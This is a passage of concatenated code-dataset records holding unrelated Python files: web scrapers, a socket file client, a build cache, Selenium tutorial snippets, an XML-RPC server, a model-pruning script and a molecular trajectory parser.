ConvertDateString\n\n\nclass Emprego24h(IncrementalATSSpider):\n\n name = 'emprego24h'\n ref_re = compile(r\"emprego\\/(\\d+)\")\n num_re = compile(r\"(\\d+)\")\n det_xpath = '//span[contains(text(), \"%s\")]/following-sibling::strong/text()'\n download_delay = 0.4\n\n def parse(self, response):\n sel = Selector(response)\n categories = sel.xpath('//div[@class=\"boxCatsInd\"]')\n for cat in categories:\n cat_url = cat.xpath('./a/@href').extract()\n if cat_url:\n yield Request(\n cat_url[0], callback=self.parse_jobs_list,\n meta={\n 'cat': cat.xpath('./a/text()').extract(),\n 'count': cat.xpath('./span/text()').re(self.num_re),\n 'is_first_page': True,\n }\n )\n\n def parse_jobs_list(self, response):\n sel = Selector(response)\n jobs = sel.xpath('//div[@class=\"tabconteudohp\"]/li')\n for job in jobs:\n job_url = job.xpath('./h4/a/@href').extract()\n if job_url:\n meta = {\n 'title': job.xpath('./h4/a/text()').extract(),\n 'cat': response.meta.get('cat'),\n }\n request = Request(\n job_url[0], callback=self.parse_job_callback(), meta=meta\n )\n fields_to_hash = {'url': job_url[0]}\n incremental_crawler_hash = self.hash_fields(fields_to_hash)\n yield self.is_new_job_request(incremental_crawler_hash, request)\n\n is_first_page = response.meta.get('is_first_page')\n if is_first_page and response.meta.get('count'):\n tot_pages = int(response.meta.get('count')[0]) / 15\n for i in xrange(1, tot_pages+1, 1):\n next_url = response.url + '?p=%s' % i\n yield Request(next_url, callback=self.parse_jobs_list,\n meta={\n 'cat': response.meta.get('cat'),\n 'is_first_page': False,\n }\n )\n\n def parse_job(self, response):\n error = self.validate_parse_job(response)\n if error:\n self.log(\"Job Posting has been expired or has been filled!!!\")\n return\n\n loader = BrightcorpItemLoader(response=response)\n loader.add_value('url', response.url)\n loader.add_value('title', response.meta.get('title'))\n loader.add_value('jobcategory', response.meta.get('cat'))\n loader.add_value(\n 'referencenumber', response.url,\n Prefix('%s-' % self.name), re=self.ref_re\n )\n loader.add_xpath(\n 'location', self.det_xpath % unicode('Localização:', 'utf-8')\n )\n loader.add_xpath(\n 'jobtype', self.det_xpath % unicode('Duranção:', 'utf-8')\n )\n loader.add_xpath(\n 'company', self.det_xpath % unicode('Empresa:', 'utf-8')\n )\n loader.add_xpath(\n 'date', self.det_xpath % 'Publicado em:', ConvertDateString('%d-%m-%Y')\n )\n loader.add_xpath(\n 'description', '//div[@class=\"jobdesc\"]/p[@class=\"detjob\"]'\n )\n \n fields_to_hash = {'url': response.url}\n incremental_crawler_hash = self.hash_fields(fields_to_hash)\n loader.add_value('incremental_crawler_hash', incremental_crawler_hash)\n\n yield loader.load_item()\n\n def validate_parse_job(self, response):\n sel = Selector(response)\n old_ad = sel.xpath('//div[@id=\"old-ad\"]/text()').extract()\n if old_ad:\n return True\n\n return False\n","sub_path":"brightcorp/brightcorp/spiders/emprego24h.py","file_name":"emprego24h.py","file_ext":"py","file_size_in_byte":4288,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"3590907","text":"#coding=utf-8\n#!/usr/bin/env python3\n\nname = input()\nnames=name.split()\nfor i in range(len(names)):\n names[i]=names[i].capitalize()\n\nif len(names)<=2:\n print(' '.join(names))\nelse:\n output=''\n for i in range(len(names)):\n now=names[i]\n if i==0:\n output+=(now+' ')\n elif i==len(names)-1:\n output+=now\n else:\n output+=now[0]+'. '\n print(output)","sub_path":"oj/2C.py","file_name":"2C.py","file_ext":"py","file_size_in_byte":418,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"270872598","text":"import socket\nimport os\nfrom archivos_x_socket import archivo\n\nHOST = '192.168.43.247'\nPORT = 8001\nBUFFER = 1024\n\ndef menu():\n os.system(\"clear\")\n print(\"\"\"\n 1) Crear un Nuevo archivo\n 2) Eliminar archivo\n 3) Actualizar archivo\n 4) Mostrar Contenido de un archivo\n \"\"\")\n\ndef listar_archivos():\n print(\"\\t Archivo en este directorio\")\n directorio = os.listdir(\"./\")\n for archivo in directorio:\n print(f\"\\t>>{archivo}\")\n \n\ndef avisar(accion,conexion,nombre_archivo):\n listar_archivos()\n '''\n acciones:\n 1:agregar archivo\n 2:eliminar archivo\n 3:actualizar archivo\n 4:mostrar contenido de un archivo \n '''\n if accion == 1:\n conexion.send(bytes('nuevo','utf-8'))\n respuesta = conexion.recv(BUFFER).decode('utf-8')\n if str(respuesta) == 'ok':\n if archivo.nuevo_archivo(nombre_archivo):\n print(f\"Archivo:{nombre_archivo} creado exitosamente\")\n print(\"enviando archivo...\")\n archivo.mandar_archivo(conexion,nombre_archivo)\n\n elif accion == 2:\n conexion.send(bytes('eliminar','utf-8'))\n respuesta = conexion.recv(BUFFER).decode('utf-8')\n if str(respuesta) =='ok':\n conexion.send(bytes(nombre_archivo,'utf-8'))\n if archivo.eliminar_archivo(nombre_archivo):\n print(f\"Archivo:{nombre_archivo} ha sido eliminado\")\n else:\n print(f\"no se puede eliminar el archivo:{nombre_archivo}\")\n\n elif accion == 3:\n conexion.send(bytes('actualizar','utf-8'))\n respuesta = conexion.recv(BUFFER).decode('utf-8')\n if str(respuesta) == 'ok':\n if archivo.actualizar_archivo(nombre_archivo):\n print(f\"Archivo:{nombre_archivo} ha sido eliminado\")\n archivo.mandar_archivo(conexion,nombre_archivo,\"actualizar\")\n else:\n print(f\"no se puede actualizar el archivo:{nombre_archivo}\")\n\n elif accion == 4:\n ruta = './' + nombre_archivo\n if not \".txt\" in nombre_archivo:\n ruta += '.txt'\n if os.path.isfile(ruta):\n os.system(f\"cat {nombre_archivo}\") \n input(\"Oprima Enter para continuar...\")\n else:\n print(f\"el archivo{nombre_archivo} no existe\")\n input(\"Oprima Enter para continuar...\")\n\n\nwith socket.socket(socket.AF_INET,socket.SOCK_STREAM) as servidor:\n servidor.connect((HOST,PORT))\n while True:\n menu()\n accion = int(input(\"Ingresa la acción que se quiere Realizar:\"))\n listar_archivos()\n nombre_archivo = input(\"Ingrese el nombre del archivo a crear/eliminar/actualizar: \")\n avisar(accion,servidor,nombre_archivo)\n \n\n","sub_path":"Programacion concurrente/sockets/TCP/practica/maquina_cliente/cliente.py","file_name":"cliente.py","file_ext":"py","file_size_in_byte":2789,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"118949662","text":"import time\n\nfrom buildapi.model.builds import getBuildsQuery, requestFromRow, buildFromRow, \\\n getRevision, getPendingQuery\nfrom buildapi.lib.times import dt2ts, ts2dt, oneday, now\n\nimport logging\nlog = logging.getLogger(__name__)\n\ndef getBuilds(branch, starttime, endtime):\n log.info(\"Getting builds on %s between %s and %s\", branch, starttime,\n endtime)\n build_q = getBuildsQuery(branch, starttime, endtime)\n\n # Elements with the same claimed_by_name, claimed_by_incarnation,\n # claimed_at, buildername, and number are actually the same build and\n # should only be represented once\n builds = {}\n retval = []\n for build in build_q.execute():\n key = (build.claimed_by_name, build.claimed_by_incarnation,\n build.claimed_at, build.buildername, build.number)\n if key in builds:\n request = requestFromRow(build)\n builds[key]['requests'].append(request)\n else:\n builds[key] = buildFromRow(build)\n retval.append(builds[key])\n\n q = getPendingQuery(branch, starttime, endtime)\n for req in q.execute():\n retval.append(requestFromRow(req))\n\n return retval\n\nclass BuildapiCache:\n def __init__(self, cache, timezone):\n self.cache = cache\n self.timezone = timezone\n\n def build_key_for_day(self, date, branch):\n assert date.tzinfo\n return \"builds:%s:%s\" % (branch, date.strftime('%Y-%m-%d'))\n\n def build_key_for_rev(self, branch, rev):\n return \"builds:%s:%s\" % (branch, rev)\n\n def get_builds_for_revision(self, branch, revision):\n revision = revision[:12]\n key = self.build_key_for_rev(branch, revision)\n return self.cache.get(key, getRevision, (branch, revision),\n expire=time.time()+120)\n\n def get_builds_for_day(self, date, branch):\n \"\"\"\n Returns a list of builds for the given date (a datetime.datetime instance)\n \"\"\"\n assert date.tzinfo\n key = self.build_key_for_day(date, branch)\n starttime = dt2ts(date)\n endtime = dt2ts(date + oneday)\n\n if date - now(self.timezone) < 3*oneday:\n # Expire soon\n expire = time.time() + 60\n else:\n # Don't expire\n expire = 0\n\n return self.cache.get(key, getBuilds, (branch, starttime, endtime),\n expire=expire)\n\n def get_builds_for_date_range(self, starttime, endtime, branch, method=0):\n \"\"\"\n Returns a list of builds for the given date range. starttime and\n endtime should be datetime.datetime instances.\n \"\"\"\n assert starttime.tzinfo\n assert endtime.tzinfo\n\n # Naive version: grab every day individually\n if method == 0:\n retval = []\n d = starttime\n while d < endtime:\n builds = self.get_builds_for_day(d, branch)\n retval.extend(builds)\n d += oneday\n return retval\n\n # Less naive version? grab the entire date range if anything isn't\n # cached\n if method == 1:\n d = starttime\n need_more = False\n while d < endtime:\n key = self.build_key_for_day(d, branch)\n if not self.cache.has_key(key):\n need_more = True\n break\n d += oneday\n\n if not need_more:\n # Fall back to method 0\n return self.get_builds_for_date_range(starttime, endtime,\n branch, method=0)\n\n # Do a big query to get everything\n builds = getBuilds(branch,\n dt2ts(starttime),\n dt2ts(endtime),\n )\n retval = builds\n\n # And then cache the results by date\n days = {}\n for b in builds:\n date = ts2dt(b['starttime'], self.timezone)\n date = date.replace(hour=0, minute=0, second=0, microsecond=0)\n\n days.setdefault(date, []).append(b)\n\n for date, builds in days.iteritems():\n if date - now(self.timezone) < 3*oneday:\n # Expire soon\n expire = time.time() + 60\n else:\n # Expire in half an hour\n expire = time.time() + 1800\n key = self.build_key_for_day(date, branch)\n self.cache.put(key, builds, expire=expire)\n\n return retval\n\n","sub_path":"buildapi/lib/cache.py","file_name":"cache.py","file_ext":"py","file_size_in_byte":4533,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"105071833","text":"\nfrom selenium import webdriver\ndr = webdriver.Chrome()\ndr.get('http://www.baidu.com')\n# dr.find_element_by_xpath('//input[@id=\"kw\"]').send_keys('jarthong')\n\n# 爷爷标签定位\n# dr.find_element_by_xpath('//form[@id=\"form\"]/span/input').send_keys('jarthong')\n\n# # 逻辑运算符(加强元素唯一性)\n# dr.find_element_by_xpath('//input[@id=\"kw\" and @autocomplete=\"off\"]').send_keys('jarthong')\n# dr.find_element_by_xpath('//input[@value=\"百度一下\"]').click()\n# # dr.quit()\n\n# css\n# dr.find_element_by_css_selector('form#form>span>input.s_ipt').send_keys('jarthong')\n\n# is_displayer() 查看元素是否可见\n# m = dr.find_element_by_id('kw').is_displayed()\n# print(m)\n\n\n# 显示等待\nfrom selenium import webdriver\n# 显示等待需要导入下面三个方法(类),\nfrom selenium.webdriver.support import expected_conditions as EC # 判断元素是否出现的类\nfrom selenium.webdriver.support.ui import WebDriverWait # 显示等待需要结合WebDriverWait这个类使用\nfrom selenium.webdriver.common.by import By # 元素定位的另外一种写法\n\ndr = webdriver.Chrome()\ndr.get('http://www.baidu.com')\n# WebDriverWait这个类需要传三个参数,第一个参数是浏览器驱动,第二个参数是整个判断的总时长,第三个是代表多久判断一次(单位是秒)\nWebDriverWait(dr,5,0.5).until(EC.presence_of_element_located((By.ID,\"kw\"))).send_keys('jathong')\n\n\n\n# By类使用方法\nfrom selenium import webdriver\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.common.keys import Keys # 键盘事件\nfrom time import sleep\ndr = webdriver.Chrome()\ndr.get('http://www.baidu.com')\ndr.maximize_window() # 窗口最大化\ndr.find_element(By.ID,'kw').send_keys('jarthong') # 定位到百度输入框,输入内容\ndr.find_element(By.CSS_SELECTOR,'[value=\"百度一下\"]').click() # 点击“百度一下”\n\nsleep(3)\ndr.find_element(By.ID,'kw').send_keys(Keys.BACK_SPACE)\nsleep(3)\ndr.find_element(By.ID,'kw').send_keys('hong')\nsleep(3)\ndr.find_element(By.CSS_SELECTOR,'[value=\"百度一下\"]').send_keys(Keys.ENTER)\n\nsleep(3)\n# 调用javascript方法来执行滚动条\n# 以下这条命令,除了把纵向滚动条从上往下拉之外,也同时会把横向滚动条从右往左拉,若横向本身就在左边,则不动\ndr.execute_script('window.scrollTo(0,2500)') # 纵向拉动滚动条,从上往下拉\nsleep(3)\n# dr.execute_script('window.scrollTo(2500,0)') # 从下往上拉\n# 定位一组元素,通过数组下标来确定第几个元素\ndr.find_elements(By.CLASS_NAME,'pc')[1].click()\nsleep(3)\n# 设置窗口大小,为了调出横向滚动条\ndr.set_window_size(600,480)\nsleep(3)\ndr.execute_script('window.scrollTo(0,800)')\nsleep(3)\n# 这条命令,除了把横���滚动条从左往右拉之外,也同时会把纵向滚动条从下往上拉\ndr.execute_script('window.scrollTo(2500,0)')\n\n\n\n# 鼠标悬停\nfrom selenium import webdriver\n# 导入ActionChains鼠标悬停模块\nfrom selenium.webdriver.common.action_chains import ActionChains\nfrom time import sleep\ndr = webdriver.Chrome()\ndr.get('http://www.baidu.com')\nsleep(2)\n# 先获取要悬停的元素\n# 注意:百度登录账号状态和未登录账号,元素属性不一样\nname = dr.find_element_by_link_text('设置')\n# ActionChains需要传入驱动参数...移动到要悬停的元素...执行操作\nActionChains(dr).move_to_element(name).perform()\nsleep(3)\ndr.find_element_by_link_text('高级搜索').click()\n\n\n\nfrom selenium import webdriver\nfrom time import sleep\ndr = webdriver.Chrome()\ndr.get('https://www.baidu.com/')\ndr.find_element_by_id('kw').send_keys('渗透吧')\ndr.find_element_by_id('su').click()\nsleep(3)\ndr.find_element_by_xpath('//*[@id=\"1\"]/h3/a').click() # 点击搜索出来的第一个贴吧\nprint(dr.window_handles) # 打印看一下句柄,(实际操作时省去),以数组的形式存在\nsleep(3)\n# 切换到第二个窗口(即新打开的窗口),第二个页面的句柄dr.window_handles[1]\ndr.switch_to.window(dr.window_handles[1])\n# 点击第一个帖子\ndr.find_element_by_xpath('//*[@id=\"thread_top_list\"]/li[1]/div/div[2]/div/div[1]/a').click()\nsleep(3)\n# 切换到第三个窗口,(即帖子打开的窗口)\ndr.switch_to.window(dr.window_handles[2])\n# 返回第一个窗口\ndr.switch_to.window(dr.window_handles[0])\ndr.find_element_by_id('kw').clear() # 清空输入框\nsleep(2)\ndr.find_element_by_id('kw').send_keys('jarthong')\nsleep(2)\ndr.find_element_by_id('su').click() # 点击‘百度一下’\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","sub_path":"python_selenium/selenium_test.py","file_name":"selenium_test.py","file_ext":"py","file_size_in_byte":4539,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"580219419","text":"import os\nimport argparse\n\nimport yaml\nimport logging.config\nfrom parlai.agents.programr.config.brain.brain import BrainConfiguration\nfrom parlai.agents.programr.config.programrconfig import ProgramrConfiguration\nfrom xmlrpc.server import SimpleXMLRPCServer\nfrom parlai.agents.programr.utils.classes.loader import ClassLoader\nfrom parlai.agents.programr.utils.logging.ylogger import YLogger\nfrom parlai.agents.programr.services.all_services import AllServices\nfrom parlai.agents.programr.config.xmlrpcserver.config import XMLRPCConfiguration\n\n\nclass XMLRPCServer:\n\n def __init__(self):\n self.parse_arguments()\n self.load_configuration()\n #self.initiate_logging()\n xmlrpc = XMLRPCConfiguration()\n print(xmlrpc.host)\n print(xmlrpc.port)\n self.server = SimpleXMLRPCServer((xmlrpc.host,\n xmlrpc.port),\n logRequests=True)\n\n self.services_config = self.configuration.bot.brain.services\n self.nlp_config = self.configuration.bot.brain.nlp\n self.register_functions()\n\n def get_server_configuration(self):\n return BrainConfiguration(\"brain\")\n\n\n def parse_arguments(self):\n client_args = argparse.ArgumentParser()\n client_args.add_argument(\"--config\", type=str, action='store')\n client_args.add_argument(\"--cformat\", type=str, action='store')\n #client_args.add_argument(\"logging\", type=str)\n self.arguments = client_args.parse_args()\n\n def get_description(self):\n return 'ProgramR XML RPC Server'\n\n def add_client_arguments(self, parser=None):\n # Nothing to add\n return\n\n def parse_args(self, arguments, parsed_args):\n # Nothing to add\n return\n\n def load_configuration(self):\n config_filename = self.arguments.config\n config_format = self.arguments.cformat\n\n if config_filename is not None:\n self._configuration = ProgramrConfiguration.from_file(config_filename,\n config_format,\n )\n else:\n raise Exception(\"No configuration file specified\")\n\n @property\n def configuration(self):\n return self._configuration\n\n\n def register_functions(self):\n loader = ClassLoader()\n YLogger.debug(self, \"Loading Services.\")\n for service_name in self.services_config:\n service_config = self.services_config[service_name]\n meta_class = loader.instantiate_class(service_config.classname)\n setattr(AllServices, service_name, meta_class)\n if service_config.is_native:\n setattr(AllServices, service_name.lower(), meta_class(self.nlp_config))\n else:\n setattr(AllServices, service_name.lower(), meta_class(service_config))\n\n self.server.register_instance(AllServices, allow_dotted_names=True)\n\n def initiate_logging(self, arguments):\n if arguments.logging is not None:\n with open(arguments.logging, 'r+', encoding=\"utf-8\") as yml_data_file:\n logging_config = yaml.load(yml_data_file, Loader=yaml.FullLoader)\n logging.config.dictConfig(logging_config)\n YLogger.info(self, \"Now logging under configuration\")\n else:\n print(\"Warning. No logging configuration file defined, using defaults...\")\n\n def run(self):\n try:\n print('Serving...')\n self.server.serve_forever()\n except KeyboardInterrupt:\n print(\"Exiting\")\n\n\nif __name__ == \"__main__\":\n server = XMLRPCServer()\n server.run()\n","sub_path":"parlai/agents/programr/rpcservices/xmlrpcserver.py","file_name":"xmlrpcserver.py","file_ext":"py","file_size_in_byte":3737,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"466446880","text":"import os\nimport torch\n\nlr = '0.1'\nsave = 'vgg16-cifar100_lf'\npr_list = [30, 50, 70]\nsnap_list = [9, 19, 29, 39, 49, 59, 69, 79, 89, 99, 109, 119, 129, 139, 149, 159]\nepochs_base = 160\nlr_drop_ep1 = 80\nlr_drop_ep2 = 120\n\ntorch.set_num_threads(6)\n\nbase_search = 'CUDA_VISIBLE_DEVICES=0 python main.py \\\n--dataset cifar100 \\\n--arch vgg \\\n--depth 16 \\\n--lr '+lr+' \\\n--epochs %d \\\n--schedule 80 120 \\\n--batch-size 256 \\\n--test-batch-size 256 \\\n--save ./baseline/'+save+' \\\n--momentum 0.9 \\\n--sparsity-regularization'\n\nbase_prune = 'CUDA_VISIBLE_DEVIDES=0 python vggprune.py \\\n--dataset cifar100 \\\n--test-batch-size 256 \\\n--depth 16 \\\n--percent 0.3 \\\n--model ./baseline/'+save+'/ckpt%d_%d.pth.tar \\\n--save ./baseline/'+save+'/prune%d_%d \\\n--gpu_ids 0'\n\nbase_retrain = 'CUDA_VISIBLE_DEVICES=0 python main_c.py \\\n--dataset cifar100 \\\n--arch vgg \\\n--depth 16 \\\n--lr '+lr+' \\\n--epochs %d \\\n--schedule %d %d \\\n--batch-size 256 \\\n--test-batch-size 128 \\\n--save ./baseline/'+save+'/retrain%d_%d_'+lr+' \\\n--momentum 0.9 \\\n--sparsity-regularization \\\n--scratch ./baseline/'+save+'/prune%d_%d/pruned.pth.tar \\\n--start-epoch %d'\n\nbase_eb_prune = 'CUDA_VISIBLE_DEVIDES=0 python vggprune.py \\\n--dataset cifar100 \\\n--test-batch-size 256 \\\n--depth 16 \\\n--percent 0.3 \\\n--model ./baseline/'+save+'/EB_%d_%d.pth.tar \\\n--save ./baseline/'+save+'/EB_prune%d_%d \\\n--gpu_ids 0'\n\nbase_eb_retrain = 'CUDA_VISIBLE_DEVICES=0 python main_c.py \\\n--dataset cifar100 \\\n--arch vgg \\\n--depth 16 \\\n--lr '+lr+' \\\n--epochs %d \\\n--schedule %d %d \\\n--batch-size 256 \\\n--test-batch-size 128 \\\n--save ./baseline/'+save+'/EB_retrain%d_%d_'+lr+' \\\n--momentum 0.9 \\\n--sparsity-regularization \\\n--scratch ./baseline/'+save+'/EB_prune%d_%d/pruned.pth.tar \\\n--start-epoch %d'\n\nprint('SEARCHING')\nos.system(base_search % epochs_base)\nfor pr in pr_list:\n for snap in snap_list:\n print('PRUNING PR %d AND SNAP %d' % (pr, snap))\n os.system(base_prune % (snap, pr, snap, pr))\n print('RETRAINING PR %d AND SNAP %d' % (pr, snap))\n os.system(base_retrain % (snap + epochs_base, lr_drop_ep1 + snap, lr_drop_ep2 + snap, snap, pr, snap, pr, snap))\n files = os.listdir('./baseline/'+save)\n b = []\n for file in files:\n if 'EB' in file and '_m.' not in file and file[3:5] == str(pr):\n b.append(file)\n if len(b) == 1:\n b = b[0]\n snap = int(b.split('_')[2][0:-8])\n print('PRUNING EB PR %d' % pr)\n os.system(base_eb_prune % (pr, snap, snap, pr))\n print('RETRAINING EB PR %d' % pr)\n os.system(base_eb_retrain % (snap + epochs_base, lr_drop_ep1 + snap, lr_drop_ep2 + snap, snap, pr, snap, pr, snap))","sub_path":"standard_train_auto.py","file_name":"standard_train_auto.py","file_ext":"py","file_size_in_byte":2614,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"5742797","text":"#! /usr/bin/env python\n# -*- coding: utf-8 -*-\n\nimport os\nfrom datetime import date\nfrom urllib.request import urlopen\nfrom bs4 import BeautifulSoup\n\nimport psycopg2\n\n\ndef initial_settings(log_dir='log', db_dir='data'):\n if log_dir not in os.listdir():\n os.mkdir(log_dir)\n if db_dir not in os.listdir():\n os.mkdir(db_dir)\n urls = dict(\n top = 'http://kabureal.net',\n pagelist = '/brandlist/?code={}',\n brandpage = '/brand/?code={}')\n return log_dir, db_dir, urls\n\n\ndef _get_brandlist(url):\n print('access {}'.format(url))\n html = urlopen(url)\n bsObj = BeautifulSoup(html, 'html.parser')\n num = int(bsObj.find('div', class_='mtop10 fs15').find('span').get_text())\n\n cnt = 0\n for brand in bsObj.findAll('div', class_='span4'):\n if ('href' not in brand.find('a').attrs or\n not brand.find('a')['href'].startswith('/brand/?code=')):\n continue\n b_id, b_name = brand.find('a').get_text().split(maxsplit=1)\n try:\n main_f, sub_f = brand.find('div').get_text().split(maxsplit=1)\n except ValueError:\n main_f , sub_f = '', brand.find('div').get_text().strip()\n cnt += 1\n yield b_id, b_name, main_f, sub_f\n\n assert cnt == num, '{} brands expected, but get {} from {}'.format(num, cnt, url)\n \n\ndef get_brandlist(db_dir, urls, max_page=18): # max 18 => 9500~9999\n for page_idx in [1000 + i * 500 for i in range(max_page)]:\n url = urls['top'] + urls['pagelist'].format(page_idx)\n for b_id, b_name, main_f, sub_f in _get_brandlist(url):\n with open(db_dir + '/brands.txt', 'a') as f:\n f.write('{}@{}@{}@{}\\n'.format(b_id, b_name, main_f, sub_f))\n\n\ndef read_brandlist(db_dir):\n with open(db_dir + '/brands.txt', 'r') as f:\n lines = f.read()\n for line in lines.split('\\n'):\n if line:\n b_id, b_name, main_f, sub_f = line.split('@')\n yield b_id, b_name, main_f, sub_f\n\n\ndef create_master_brands(db_dir):\n with open(db_dir + '/brands.txt', 'r') as f:\n lines = f.read()\n lines = [line.split('@') for line in lines.split('\\n') if line]\n brands = [(line[0], line[1]) for line in lines]\n main_fields = sorted(list(set([line[2] for line in lines])))\n sub_fields = sorted(list(set([line[3] for line in lines])))\n main_fields = [elm if elm else 'undefined' for elm in main_fields]\n sub_fields = [elm if elm else 'undefined' for elm in sub_fields]\n template_b = \"INSERT INTO {} ({}, {}) VALUES ('{}', '{}');\\n\"\n template_f = \"INSERT INTO {} ({}, {}) VALUES ('{:0>3}', '{}');\\n\"\n with open(db_dir + '/brands_master.sql', 'w') as f:\n f.write('BEGIN TRANSACTION;\\n')\n for c, n in brands:\n f.write('-- {}:{}\\n'.format(c, n))\n f.write(template_b.format(\n 'Brands', 'code', 'name', c, n))\n f.write('COMMIT;\\n')\n with open(db_dir + '/markets_master.sql', 'w') as f:\n f.write('BEGIN TRANSACTION;\\n')\n for i, n in enumerate(main_fields):\n f.write('-- {:0>3}:{}\\n'.format(i, n))\n f.write(template_f.format(\n 'Markets', 'code', 'name', i, n))\n f.write('COMMIT;\\n')\n with open(db_dir + '/kinds_master.sql', 'w') as f:\n f.write('BEGIN TRANSACTION;\\n')\n for i, n in enumerate(sub_fields, 1):\n f.write('-- {:0>3}:{}\\n'.format(i, n))\n f.write(template_f.format(\n 'Kinds', 'code', 'name', i, n))\n f.write('COMMIT;\\n')\n\n\ndef _get_brandinfo(code, urls, db_dir):\n html = urlopen(urls['top'] + urls['brandpage'].format(code))\n bsObj = BeautifulSoup(html, 'html.parser')\n d = dict()\n for lst in bsObj.find('ul', class_='inline mbtm0 fs12 corp_info').findAll('li'):\n k, v = lst.get_text().split()\n d[k] = v\n today = date.today().isoformat()\n if '市場' not in d.keys():\n d['市場'] = 'undefined'\n with open(db_dir + '/attributes_data.txt', 'a') as f:\n f.write('{}@{}@{}@{}@{}\\n'.format(\n code, today, d['市場'], d['業種分類'], int(d['単元株数'][:-1].replace(',', ''))))\n\n\ndef get_attributes(urls, db_dir):\n with open(db_dir + '/brands.txt', 'r') as f:\n lines = f.read()\n lines = [line.split('@') for line in lines.split('\\n') if line]\n codes = [line[0] for line in lines]\n for code in codes:\n print('access brand_id={}'.format(code))\n _get_brandinfo(code, urls, db_dir)\n\n\ndef get_field_table(db_dir):\n with open(db_dir + '/brands.txt', 'r') as f:\n lines = f.read()\n lines = [line.split('@') for line in lines.split('\\n') if line]\n main_fields = sorted(list(set([line[2] for line in lines])))\n main_fields = [elm if elm else 'undefined' for elm in main_fields]\n sub_fields = sorted(list(set([line[3] for line in lines])))\n sub_fields = [elm if elm else 'undefined' for elm in sub_fields]\n mft, sft = dict(), dict()\n for i, n in enumerate(main_fields):\n mft[n] = '{:0>3}'.format(i)\n for i, n in enumerate(sub_fields, 1):\n sft[n] = '{:0>3}'.format(i)\n return mft, sft\n\n\ndef create_master_attributes(db_dir, mft, sft):\n with open(db_dir + '/attributes_data.txt', 'r') as f:\n lines = f.read()\n lines = [line.split('@') for line in lines.split('\\n') if line]\n template = \"INSERT INTO {} ({}, {}, {}, {}, {}) VALUES ('{}', '{}', '{}', '{}', {});\\n\"\n with open(db_dir + '/attributes_master.sql', 'w') as f:\n f.write('BEGIN TRANSACTION;\\n')\n for code, idate, market, kind, unit in lines:\n f.write(template.format('Attributes', 'code', 'issue_date', 'market', 'kind',\n 'unit', code, idate, mft[market], sft[kind], unit))\n f.write('COMMIT;\\n')\n\n \nif __name__ == '__main__':\n log_dir, db_dir, urls = initial_settings()\n \n if 'brands.txt' in os.listdir(db_dir):\n print('{} is already exists'.format(db_dir + '/brands.txt'))\n else:\n get_brandlist(db_dir, urls)\n\n if 'brands_master.sql' in os.listdir(db_dir):\n print('{} is already exists'.format('brand master sql'))\n else:\n create_master_brands(db_dir)\n\n if 'attributes_data.txt' in os.listdir(db_dir):\n print('{} is already exists'.format(db_dir + '/attributes_data.txt'))\n else:\n get_attributes(urls, db_dir)\n\n mft, sft = get_field_table(db_dir)\n\n if 'attributes_master.sql' in os.listdir(db_dir):\n print('{} is already exists'.format('attributes master sql'))\n create_master_attributes(db_dir, mft, sft)\n\n# url = 'http://k-db.com/stocks/2017-02-21'\n","sub_path":"initial_scraping_v2_1.py","file_name":"initial_scraping_v2_1.py","file_ext":"py","file_size_in_byte":6633,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"364971590","text":"\"\"\"Detect from trajectory.\"\"\"\nimport pickle\nfrom abc import ABCMeta, abstractmethod\nfrom enum import Enum, auto\nfrom collections import defaultdict\n\nimport openbabel\nimport numpy as np\nfrom ase import Atom, Atoms\nfrom scipy.spatial import cKDTree\nfrom .dps import dps as connectmolecule\n\n\nclass Detect(metaclass=ABCMeta):\n def __init__(self, filename, atomname, pbc, errorlimit=None, errorfilename=None):\n self.filename = filename\n self.atomname = atomname\n self.pbc = pbc\n self.errorlimit = errorlimit\n self.errorfilename = errorfilename\n self.steplinenum = self._readN()\n\n @abstractmethod\n def _readN(self):\n pass\n\n @abstractmethod\n def readatombondtype(self, item):\n \"\"\"This function reads bond types of atoms such as C1111.\"\"\"\n pass\n\n @abstractmethod\n def readmolecule(self, lines):\n \"\"\"This function reads molecules.\"\"\"\n pass\n\n @staticmethod\n def gettype(inputtype):\n \"\"\"Get the class for the input file type.\"\"\"\n if inputtype == 'bond':\n detectclass = DetectBond\n elif inputtype == 'dump':\n detectclass = DetectDump\n else:\n raise RuntimeError(\"Wrong input file type\")\n return detectclass\n\n\nclass DetectBond(Detect):\n \"\"\"LAMMPS bond file.\"\"\"\n\n def _readN(self):\n \"\"\"Read bondfile N, which should be at very beginning.\"\"\"\n # copy from reacnetgenerator on 2018-12-15\n with open(self.filename if isinstance(self.filename, str) else self.filename[0]) as f:\n iscompleted = False\n for index, line in enumerate(f):\n if line.startswith(\"#\"):\n if line.startswith(\"# Number of particles\"):\n if iscompleted:\n stepbindex = index\n break\n else:\n iscompleted = True\n stepaindex = index\n N = [int(s) for s in line.split() if s.isdigit()][0]\n atomtype = np.zeros(N, dtype=np.int)\n else:\n s = line.split()\n atomtype[int(s[0])-1] = int(s[1])\n steplinenum = stepbindex-stepaindex\n self._N = N\n self.atomtype = atomtype\n self.atomnames = self.atomname[self.atomtype-1]\n return steplinenum\n\n def readatombondtype(self, item):\n # copy from reacnetgenerator on 2018-12-15\n (step, lines), _ = item\n d = defaultdict(list)\n for line in lines:\n if line:\n if line[0] != \"#\":\n s = line.split()\n atombond = sorted(\n map(lambda x: max(1, round(float(x))), s[4 + int(s[2]): 4 + 2 * int(s[2])]))\n d[pickle.dumps((self.atomnames[int(s[0]) - 1],\n atombond))].append(int(s[0]))\n return d, step\n\n def readmolecule(self, lines):\n # copy from reacnetgenerator on 2018-12-15\n bond = [None]*self._N\n for line in lines:\n if line:\n if not line.startswith(\"#\"):\n s = line.split()\n bond[int(s[0])-1] = map(lambda x: int(x) -\n 1, s[3:3+int(s[2])])\n molecules = connectmolecule(bond)\n return molecules\n\n\nclass 